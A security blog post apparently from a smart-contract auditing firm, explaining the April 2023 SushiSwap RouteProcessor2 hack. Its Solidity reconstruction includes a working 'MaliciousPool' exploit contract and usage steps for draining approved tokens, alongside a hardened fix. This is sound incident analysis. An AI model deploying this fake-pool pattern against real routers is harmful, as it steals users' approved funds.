SushiSwap DEX Hack Explained

By Hacker Hacken

TL;DR

  • SushiSwap's RouteProcessor2 router contract was exploited on April 9, 2023.
  • About $3.3 million was stolen; white hats recovered over 1,000 ETH the same day.
  • The flaw sat in a new routing contract deployed four days before the attack: it never checked that the pool named in a user-supplied route was genuine before trusting that pool's callback.

On April 9, 2023, an unknown attacker stole about $3.3M; a single user, @0xsifu, lost roughly 1,800 ETH. The flaw was an approval-related bug in the RouteProcessor2 smart contract: halfway through a swap, the contract accepted a callback from whatever pool the route named and, on the strength of that callback, pulled tokens from any account that had approved it.

Key points:

  • The exploited contract was introduced four days before the hack. 
  • All users who had approved the RouteProcessor2 contract were at risk.
  • The risk spanned across 14 chains: Arbitrum Nova, Arbitrum, Avax, Boba, BSC, Ethereum, Fantom, Fuse, Gnosis, Moonbeam, Moonriver, Optimism, Polygon, Polygon ZkEVM.

Fortunately, because the contract was only days old, relatively few users had approved it, which capped the damage at about $3.3 million.

Vulnerability & Root Cause

The flaw sat in the permission handling of the swap path, inside the RouteProcessor2 contract, which was barely four days old when the attacker struck.

Let’s dig deeper. 

What Made It Such An Easy Target?

First, the contract did not validate the route parameter that callers pass to processRoute. A route names the pools a swap passes through, so the attacker simply pointed it at a pool contract they controlled.

processRoute then reached swapUniV3, which wrote that pool address into the lastCalledPool state variable and called swap on the malicious pool.

The malicious pool's swap function called back into the router's uniswapV3SwapCallback. The callback's only guard was a check that msg.sender equals lastCalledPool, and it passed, because the attacker had just caused lastCalledPool to be set to their pool's address. The callback then moved the input token from the payer address encoded in the callback data to msg.sender, and that data was supplied by the attacker's pool, so the payer could be any account that had approved the router.

With that, the attacker could build transactions whose only purpose was to drain tokens from users who had approved the new RouteProcessor2 contract, naming a different victim as payer in each callback.

In short: a malicious pool plus a missing validation check was enough to drain approved funds.
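The flow described above, as an added reconstruction written for this article and not SushiSwap's code: the contract names, the cut-down interfaces, the plain function arguments standing in for the encoded route stream, and the constructor-supplied token and victim addresses are all assumptions. VulnerableRouter mirrors the unchecked path, MaliciousPool is the attacker's fake pool, and HardenedRouter shows the two checks that close the hole: verifying the pool against the canonical factory, and choosing the payer inside the router instead of reading it from callback data.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Illustrative reconstruction of the RouteProcessor2 callback flaw, written for
// this article. Not SushiSwap's code: interfaces are reduced to what the example
// needs and the stream-based route parsing is replaced by plain arguments.

interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

interface IUniswapV3Pool {
    function swap(address recipient, bool zeroForOne, int256 amountSpecified,
        uint160 sqrtPriceLimitX96, bytes calldata data) external returns (int256 amount0, int256 amount1);
}

interface IUniswapV3Factory {
    function getPool(address tokenA, address tokenB, uint24 fee) external view returns (address);
}

interface IUniswapV3SwapCallback {
    function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata data) external;
}

/// Vulnerable shape: the pool address comes straight from the caller's route.
contract VulnerableRouter is IUniswapV3SwapCallback {
    address private lastCalledPool;

    // In the real contract this is private and reached through processRoute;
    // `pool` is whatever address the route encoded, and nothing checks it.
    function swapUniV3(address pool, bool zeroForOne, address recipient,
        uint160 sqrtPriceLimitX96, address tokenIn, uint256 amountIn) external {
        lastCalledPool = pool; // attacker-chosen value becomes the callback's trust anchor
        IUniswapV3Pool(pool).swap(recipient, zeroForOne, int256(amountIn), sqrtPriceLimitX96,
            abi.encode(tokenIn, msg.sender));
        lastCalledPool = address(0);
    }

    // The sender check passes for any pool the route named, and `from` is decoded
    // from data the pool supplies, so a fake pool can name any account that
    // approved this router and have that account's tokens pulled to itself.
    function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata data) external override {
        require(msg.sender == lastCalledPool, "call from unknown source");
        int256 amount = amount0Delta > 0 ? amount0Delta : amount1Delta;
        require(amount > 0, "not positive amount");
        (address tokenIn, address from) = abi.decode(data, (address, address));
        IERC20(tokenIn).transferFrom(from, msg.sender, uint256(amount));
    }
}

/// Attacker-controlled "pool": performs no swap, just calls back naming a victim as payer.
contract MaliciousPool is IUniswapV3Pool {
    address public immutable token;  // token the victim approved to the router (constructor-supplied)
    address public immutable victim; // any account with a live approval (constructor-supplied)

    constructor(address token_, address victim_) { token = token_; victim = victim_; }

    function swap(address, bool, int256 amount, uint160, bytes calldata)
        external override returns (int256, int256) {
        // msg.sender is the router; it set lastCalledPool = address(this) just before
        // calling us, so its only guard passes and it transfers `amount` of `token`
        // from `victim` to this contract.
        IUniswapV3SwapCallback(msg.sender).uniswapV3SwapCallback(amount, 0, abi.encode(token, victim));
        return (amount, 0);
    }
}

/// Hardened shape: validate the pool against the canonical factory, and never let
/// callback data decide who pays.
contract HardenedRouter is IUniswapV3SwapCallback {
    IUniswapV3Factory public immutable factory;
    address private lastCalledPool;
    address private payer; // set by the router itself before the swap, cleared after

    constructor(IUniswapV3Factory factory_) { factory = factory_; }

    function swapUniV3(address pool, address tokenIn, address tokenOut, uint24 fee, bool zeroForOne,
        address recipient, uint160 sqrtPriceLimitX96, uint256 amountIn) external {
        // 1. Only the pool the factory deployed for (tokenIn, tokenOut, fee) may be called.
        require(pool != address(0) && pool == factory.getPool(tokenIn, tokenOut, fee), "not a factory pool");
        lastCalledPool = pool;
        payer = msg.sender; // 2. the payer is the swap initiator, decided here, not by the pool
        IUniswapV3Pool(pool).swap(recipient, zeroForOne, int256(amountIn), sqrtPriceLimitX96, abi.encode(tokenIn));
        lastCalledPool = address(0);
        payer = address(0);
    }

    function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata data) external override {
        require(msg.sender == lastCalledPool, "call from unknown source");
        int256 amount = amount0Delta > 0 ? amount0Delta : amount1Delta;
        require(amount > 0, "not positive amount");
        address tokenIn = abi.decode(data, (address));
        // 3. Funds can only ever move from the account that started this swap.
        IERC20(tokenIn).transferFrom(payer, msg.sender, uint256(amount));
    }
}
```

Deploy MaliciousPool with a token and a victim that has approved VulnerableRouter, then call VulnerableRouter.swapUniV3 with the pool's address from any account: the victim's tokens land in the pool without the caller spending anything. The same call against HardenedRouter reverts at the factory check, and even a genuine pool can only move funds from msg.sender. Uniswap's own SwapRouter does the pool check by recomputing the CREATE2 address from the pool key; the factory lookup here is the simpler equivalent at the cost of an extra external call. The user-side exposure check that Sushi's tool automated is the mirror image of this: for each token you hold on each affected chain, read allowance(yourAddress, RouteProcessor2) and, where it is non-zero, send approve(RouteProcessor2, 0).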

What Tools and Techniques Were Used By Hackers?

The attacker used the following tools and techniques:

  • Etherscan – to monitor the RouteProcessor2 contract's activity and identify the accounts that had approved it, i.e. the potential victims.
  • Approval exploit – to pull funds from those accounts through RouteProcessor2, bypassing the callback's sender check by steering the route to a pool they controlled, which set the lastCalledPool storage variable to their own address.
  • Flash loans – to obtain large amounts of ETH and USDC from protocols such as Aave and dYdX, which were then used to interact with RouteProcessor2 and trigger the exploit.
  • Repeated callbacks – to invoke uniswapV3SwapCallback several times within a single transaction and drain multiple victims at once. This is often described as reentrancy, since the pool re-enters the router mid-swap, but the root problem was that the router trusted whichever pool it had just been told to call.

The Heroes: White Hats Save The Day

At first, a third-party security firm flagged the attacker's initial transactions, and that first attempt was headed off, sparing about 100 ETH. The attacker then tried again and succeeded. Sushi, already alerted, quickly called on white hat hackers for help.

On the day of the attack, the white hat community recovered over 1,000 ETH of the stolen funds:

  • 300 ETH recovered by 0XCoffeBabe
  • 700 ETH by Lido
  • At least 4 ETH across 600 addresses by Anish Agnihotri

Jared Grey, Sushi's Head Chef, acknowledged the error and advised users to revoke their approvals, that is, to set each token's allowance for RouteProcessor2 back to zero.

Sushi Reimbursement Plan

Three days after the exploit, Sushi announced a reimbursement plan to calm its user base: a Merkle claim contract through which affected users could retrieve the funds the white hats had recovered.

SushiSwap also released a tool that lets users check whether they are exposed on each affected network, including Ethereum, Polygon, Avalanche, Arbitrum, Gnosis, Optimism and others.

Market Reactions & Consequences

The SUSHI token dropped a modest 6% in the 24 hours after the exploit. The damage, fortunately, was neither massive nor widespread.

Exposed users were either drained quickly or revoked their approvals in time, and the white hat effort did much to limit the fallout. The incident is nonetheless an embarrassment for SushiSwap, and the aftermath is still unfolding.

Just a week before the hack, Jared Grey, SushiSwap’s key figure, highlighted a substantial surge in volume for the DEX’s cross-chain swap (xSwap). On top of that, Sushi’s DAO recently found itself in the crosshairs of the U.S. SEC. The legal case is yet to play out.

Lessons Learned

The main lesson of the SushiSwap hack is the importance of validating user-supplied input. Here, the failure to validate the pools named in routes passed to RouteProcessor2 let the attacker insert a malicious pool and take tokens from every user who had approved the contract.

Like many of the most significant DeFi hacks, this attack took advantage of vulnerabilities in unaudited code. Smart contract audits and penetration testing before deployment, and again for every new contract that will hold user approvals, should be the default for projects in the DeFi space.

The active involvement of white hat hackers also proved invaluable after the exploit. The case shows the value of engaging a broader community, including through bug bounties. Sushi offered a more modest bounty than the industry standard, but passionate white hats still came to help quickly.
